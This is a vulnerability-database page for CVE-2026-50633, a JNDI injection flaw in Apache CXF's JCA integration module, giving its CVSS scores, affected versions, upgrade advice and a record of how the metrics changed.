CVE-2026-50633 - Vulnerability Details

- Apache CXF: JNDI Injection vulnerability in DispatchMDBMessageListenerImpl

Description

A JNDI Injection vulnerability has been discovered in Apache CXF's JCA integration module, which can allow for code execution, if an attacker is able to manipulate the JCA deployment descriptor (ra.xml) or runtime activation parameters. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.

Published: 2026-06-12

Score: 8.1 High

EPSS: < 1% Very Low

KEV: No

Impact:

Action:

Analysis

Impact

A JNDI Injection flaw in Apache CXF’s JCA integration allows an attacker who can alter the JCA deployment descriptor (ra.xml) or its runtime activation parameters to execute arbitrary code. The weakness is due to insufficient validation of JNDI references (CWE‑20), leading to potential compromise of confidentiality, integrity, and availability on affected hosts.

Affected Systems

The flaw affects the Apache CXF product bundled by the Apache Software Foundation. Versions prior to 4.2.2 and 4.1.7 are vulnerable, as they contain the unpatched JCA integration module that processes JNDI lookups without proper validation.

Risk and Exploitability

The CVSS score is 8.1, and EPSS was reported to be less than 1%; the vulnerability is not listed in CISA’s KEV catalog, indicating no documented exploits yet. Still, the high CVSS score demonstrates a significant potential for code execution via a manipulated deployment descriptor. The threat remains pronounced in environments where attackers can modify configuration files or have local access. The likely attack vector involves local or privileged alteration of ra.xml or JCA activation parameters, so mitigations should focus on strict file permissions and rapid patching.

Default status is the baseline for the product, each version can override it (e.g. patched versions marked unaffected).

Vendor Product Default status Versions

Apache Software Foundation

Apache CXF

unaffected

Version	Status	Constraints
`4.2.0`	affected	< 4.2.2
`0`	affected	< 4.1.7

No data.

No data available yet.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

Upgrade Apache CXF to version 4.2.2 or 4.1.7 to apply the JNDI injection fix.
If upgrading is not immediately possible, disable the JCA integration module until a patch is available.
Enforce strict file permissions on the JCA deployment descriptor (ra.xml) and runtime activation parameters so that only authorized administrators can modify them.

Generated by OpenCVE AI on June 12, 2026 at 16:39 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

No CVSS v4.0

Attack Vector Network

Attack Complexity High

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

The EPSS score is 0.00039.

Exploitation none

Automatable no

Technical Impact total

References

Link	Providers
http://www.openwall.com/lists/oss-security/2026/06/11/10
https://lists.apache.org/thread/1czhgovkgzdkyp3t61wthn0foogh2grf

History

Fri, 12 Jun 2026 15:30:00 +0000

Type	Values Removed	Values Added
Metrics	cvssV3_1 `{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}` ssvc `{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}`	cvssV3_1 `{'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}` ssvc `{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}`

Fri, 12 Jun 2026 14:30:00 +0000

Type	Values Removed	Values Added
Metrics		cvssV3_1 `{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}` ssvc `{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}`

Fri, 12 Jun 2026 10:30:00 +0000

Type	Values Removed	Values Added
References		http://www.openwall.com/lists/oss-security/2026/06/11/10

Fri, 12 Jun 2026 09:45:00 +0000

Type	Values Removed	Values Added
Description		A JNDI Injection vulnerability has been discovered in Apache CXF's JCA integration module, which can allow for code execution, if an attacker is able to manipulate the JCA deployment descriptor (ra.xml) or runtime activation parameters. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.
Title		Apache CXF: JNDI Injection vulnerability in DispatchMDBMessageListenerImpl
Weaknesses		CWE-20
References		https://lists.apache.org/thread/1czhgovkgzdkyp3t61wthn0foogh2grf

Subscriptions

No data.

MITRE

Status: PUBLISHED

Assigner: apache

Published: 2026-06-12T09:02:02.547Z

Updated: 2026-06-12T14:36:44.254Z

Reserved: 2026-06-05T11:16:38.629Z

Link: CVE-2026-50633

Vulnrichment

Updated: 2026-06-12T09:28:11.629Z

NVD

Status : Undergoing Analysis

Published: 2026-06-12T10:16:23.297

Modified: 2026-06-12T16:16:33.483

Link: CVE-2026-50633

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-12T16:45:07Z

Weaknesses

CWE-20
Improper Input Validation

Impact

Affected Systems

Risk and Exploitability

Tracking

Attack Vector Network

Attack Complexity High

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

Exploitation none

Automatable no

Technical Impact total

Subscriptions

JSON object

JSON object

JSON object

JSON object

JSON object